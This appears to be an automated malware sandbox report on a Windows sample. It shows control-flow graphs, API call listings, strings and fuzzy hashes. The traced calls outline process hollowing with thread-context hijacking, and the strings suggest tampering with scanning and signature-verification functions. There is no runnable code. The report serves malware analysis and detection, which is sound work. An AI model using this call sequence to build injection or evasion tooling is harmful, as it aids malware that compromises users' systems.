call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28400 6215->6323 6396 2b29878-2b299e1 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28670 6323->6396 6397 2b29b7f-2b29beb call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6323->6397 6487 2b299e3-2b29a09 call 2b27a2c 6396->6487 6488 2b29a0b-2b29a77 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6396->6488 6424 2b29bf0-2b29d70 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 6397->6424 6424->6060 6528 2b29d76-2b29e6f call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28c80 6424->6528 6497 2b29a7c-2b29b73 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 6487->6497 6488->6497 6567 2b29b78-2b29b7d 6497->6567 6579 2b29ec3-2b2a61b call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 SetThreadContext NtResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12c2c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6528->6579 6580 2b29e71-2b29ebe call 2b28b78 call 2b28b6c 6528->6580 6567->6424 6805 2b2a620-2b2a8b2 call 2b2894c * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 5 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b28080 call 2b2894c * 2 6579->6805 6580->6579 6805->6060
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                  • GetThreadContext.KERNEL32(0000086C,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
                                                                                                                    • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                    • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                    • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                    • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                  • SetThreadContext.KERNEL32(0000086C,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,00000870,003EAFF8,02B974FC,00000004,02B97500), ref: 02B2A317
                                                                                                                  • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(0000086C,00000000,0000086C,02B97424,ScanBuffer,02B973A8,02B2A93C,ScanString,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,00000870,003EAFF8,02B974FC), ref: 02B2A324
                                                                                                                    • Part of subcall function 02B2894C: LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                    • Part of subcall function 02B2894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                    • Part of subcall function 02B2894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: LibraryMemoryThreadVirtual$ContextFree$AddressAllocateCreateLoadProcProcessReadResumeSectionUnmapUserViewWrite
                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                  • API String ID: 2388221946-51457883
                                                                                                                  • Opcode ID: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                  • Instruction ID: d31b7ef75b706298cf3e94f47eca147920a51754cd1f8958eb4517a3c0f01932
                                                                                                                  • Opcode Fuzzy Hash: 720860bb1234922ffa36ce8f489cf3a1d048504d3dea43fbd1c7f3f99b40de82
                                                                                                                  • Instruction Fuzzy Hash: 30E2E175A502289FDB11FB64DD80BCE73BAAF85300F9041F1E149AB215DE30AE89DF56
                                                                                                                  Function 02B28D6E Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 6883 2b28d6e-2b28d73 6885 2b28d78-2b28d7d 6883->6885 6885->6885 6886 2b28d7f-2b28e66 call 2b14990 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6885->6886 6917 2b2a8b7-2b2a921 call 2b14500 * 2 call 2b14c60 call 2b14500 call 2b144dc call 2b14500 * 2 6886->6917 6918 2b28e6c-2b28f47 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6886->6918 6918->6917 6962 2b28f4d-2b29275 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b130d4 * 2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14de0 call 2b14df0 call 2b28788 6918->6962 7071 2b29277-2b292e3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 6962->7071 7072 2b292e8-2b29609 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b146d4 * 2 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12ee0 call 2b12f08 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 GetThreadContext 6962->7072 7071->7072 7072->6917 7180 2b2960f-2b29872 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28400 7072->7180 7253 2b29878-2b299e1 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28670 7180->7253 7254 2b29b7f-2b29beb call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 7180->7254 7344 2b299e3-2b29a09 call 2b27a2c 7253->7344 7345 2b29a0b-2b29a77 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 7253->7345 7281 2b29bf0-2b29d70 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 7254->7281 7281->6917 7385 2b29d76-2b29e6f call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b28c80 7281->7385 7354 2b29a7c-2b29b7d call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27a2c 7344->7354 7345->7354 7354->7281 7436 2b29ec3-2b2a8b2 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b27d78 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 SetThreadContext NtResumeThread call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b12c2c call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 3 call 2b14860 call 2b149a0 call 2b146d4 call 2b147ec call 2b149a0 call 2b146d4 call 2b289d0 call 2b2894c * 2 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c * 5 call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b14860 call 2b149a0 call 2b147ec call 2b149a0 call 2b2894c call 2b28080 call 2b2894c * 2 7385->7436 7437 2b29e71-2b29ebe call 2b28b78 call 2b28b6c 7385->7437 7436->6917 7437->7436
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B289D0: FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                    • Part of subcall function 02B28788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02B28814
                                                                                                                  • GetThreadContext.KERNEL32(0000086C,02B97424,ScanString,02B973A8,02B2A93C,UacInitialize,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,UacInitialize,02B973A8), ref: 02B29602
                                                                                                                    • Part of subcall function 02B28400: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B28471
                                                                                                                    • Part of subcall function 02B28670: NtUnmapViewOfSection.NTDLL(?,?), ref: 02B286D5
                                                                                                                    • Part of subcall function 02B27A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B27A9F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MemoryVirtual$AllocateContextCreateFreeLibraryProcessReadSectionThreadUnmapUserView
                                                                                                                  • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                                                  • API String ID: 3386062106-51457883
                                                                                                                  • Opcode ID: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
                                                                                                                  • Instruction ID: b3f93cdda9a590f44b4faf4aaec77923743a965370e8e6dd3ad7c23c9ac1f0af
                                                                                                                  • Opcode Fuzzy Hash: 72212119afbe153ccbdaaa360a80b64b4f411aa58c908872cd98406c1fe6e596
                                                                                                                  • Instruction Fuzzy Hash: 4CE2D175A502289FDB11FB64DD80BCE73BAEF85300F9041E1E149AB215DE30AE89DF56
                                                                                                                  Function 02B15ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 10945 2b15acc-2b15b0d GetModuleFileNameA RegOpenKeyExA 10946 2b15b4f-2b15b92 call 2b15908 RegQueryValueExA 10945->10946 10947 2b15b0f-2b15b2b RegOpenKeyExA 10945->10947 10952 2b15b94-2b15bb0 RegQueryValueExA 10946->10952 10953 2b15bb6-2b15bd0 RegCloseKey 10946->10953 10947->10946 10948 2b15b2d-2b15b49 RegOpenKeyExA 10947->10948 10948->10946 10950 2b15bd8-2b15c09 lstrcpynA GetThreadLocale GetLocaleInfoA 10948->10950 10954 2b15cf2-2b15cf9 10950->10954 10955 2b15c0f-2b15c13 10950->10955 10952->10953 10958 2b15bb2 10952->10958 10956 2b15c15-2b15c19 10955->10956 10957 2b15c1f-2b15c35 lstrlenA 10955->10957 10956->10954 10956->10957 10960 2b15c38-2b15c3b 10957->10960 10958->10953 10961 2b15c47-2b15c4f 10960->10961 10962 2b15c3d-2b15c45 10960->10962 10961->10954 10964 2b15c55-2b15c5a 10961->10964 10962->10961 10963 2b15c37 10962->10963 10963->10960 10965 2b15c84-2b15c86 10964->10965 10966 2b15c5c-2b15c82 lstrcpynA LoadLibraryExA 10964->10966 10965->10954 10967 2b15c88-2b15c8c 10965->10967 10966->10965 10967->10954 10968 2b15c8e-2b15cbe lstrcpynA LoadLibraryExA 10967->10968 10968->10954 10969 2b15cc0-2b15cf0 lstrcpynA LoadLibraryExA 10968->10969 10969->10954
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
                                                                                                                  • RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
                                                                                                                  • RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
                                                                                                                  • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B15BE8
                                                                                                                  • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B15BF5
                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B15BFB
                                                                                                                  • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B15C26
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15C6D
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15C7D
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B15CA5
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B15CB5
                                                                                                                  • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B15CDB
                                                                                                                  • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B15CEB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                                                  • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                  • API String ID: 1759228003-2375825460
                                                                                                                  • Opcode ID: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
                                                                                                                  • Instruction ID: 7a2ce530077188beb64fcaa329d42f8f529dd1c126a4d666c34e84e99597f46f
                                                                                                                  • Opcode Fuzzy Hash: 66f81553ab7cb0b43f42c09deed6479d5bb5a711b9a0086ae204ed81fc399989
                                                                                                                  • Instruction Fuzzy Hash: CB518771A5025C7AFB35DBA88C46FEFB7ADDB44744FC001E1AB44E6181D7749A448FA0
                                                                                                                  Function 02B2894C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 13205 2b2894c-2b28971 LoadLibraryW 13206 2b28973-2b2898b GetProcAddress 13205->13206 13207 2b289bb-2b289c1 13205->13207 13208 2b289b0-2b289b6 FreeLibrary 13206->13208 13209 2b2898d-2b289ac call 2b27d78 13206->13209 13208->13207 13209->13208 13212 2b289ae 13209->13212 13212->13208
                                                                                                                  APIs
                                                                                                                  • LoadLibraryW.KERNEL32(bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize,02B973A8,02B2A93C,UacScan), ref: 02B28960
                                                                                                                  • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B2897A
                                                                                                                  • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000086C,00000000,02B973A8,02B2A587,ScanString,02B973A8,02B2A93C,ScanBuffer,02B973A8,02B2A93C,Initialize), ref: 02B289B6
                                                                                                                    • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                                                  • String ID: BCryptVerifySignature$bcrypt
                                                                                                                  • API String ID: 1002360270-4067648912
                                                                                                                  • Opcode ID: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
                                                                                                                  • Instruction ID: 02ea73879296f6fb652ecd6f8a8c70ed97984c2c0df079b6b8ef83159f43f98d
                                                                                                                  • Opcode Fuzzy Hash: cae75c363c25a3ebd496c789de25cb895f617c81b6a078381491425355d927aa
                                                                                                                  • Instruction Fuzzy Hash: 15F0FFF0AE9314EEE310A668AA49F93B3DCD380790F0089A9F90C87142CE701856AB20
                                                                                                                  Function 02B2F744 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
